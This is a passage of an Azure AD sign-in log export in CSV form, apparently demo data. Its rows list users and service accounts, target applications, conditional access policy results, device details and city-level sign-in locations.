'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",dfda3bbc-b55b-4a89-a1fb-2fc02b4b1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,dfda3bbc-b55b-4a89-a1fb-2fc02b4b1300,SigninLogs,Sucess,33.7984581,-84.38828278
+175,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:06.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6250a851-3330-4c75-b607-0a09a1b10007,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:26,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",99476ccd-67d1-454b-a7cf-079e1db41400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,99476ccd-67d1-454b-a7cf-079e1db41400,SigninLogs,Sucess,41.90428925,-85.99833679
+176,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:59.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 08:22,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",a2a6e458-53e2-4dc3-905e-f03ea5720700,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,a2a6e458-53e2-4dc3-905e-f03ea5720700,SigninLogs,Sucess,51.4458313,-0.969720006
+177,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,10:00.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 19:10,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",ae523e23-b4fa-4218-8bfd-48653bd84d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,ae523e23-b4fa-4218-8bfd-48653bd84d00,SigninLogs,Sucess,35.01296997,-80.93171692
+178,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:14.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2a441153-2f56-41f5-86a8-9fdaed59ba5d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",41cc5746-ae7e-445a-962a-17f630371700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,41cc5746-ae7e-445a-962a-17f630371700,SigninLogs,Sucess,33.7984581,-84.38828278
+179,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:13.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9d1a7243-d778-454a-8742-4fe0745cc077,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",09a9b111-0bef-49d6-ac1b-dbcd7b241800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,09a9b111-0bef-49d6-ac1b-dbcd7b241800,SigninLogs,Sucess,33.7984581,-84.38828278
+180,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:01.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ec32d17c-6671-4d01-8ad3-e08b3a6af70b,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c6df9c5c-6712-4175-a3db-58ce51731700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c6df9c5c-6712-4175-a3db-58ce51731700,SigninLogs,Sucess,36.6404686,-78.26995087
+181,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:59.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,90d9072a-3b67-4ee2-9b68-dd53dc1c7f8b,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",2903ae2d-5f7e-48a4-9564-1a66c0af1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,2903ae2d-5f7e-48a4-9564-1a66c0af1200,SigninLogs,Sucess,38.73078156,-78.17196655
+182,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:16.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3bb84064-9cdb-4308-92e6-aff7849eacd9,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 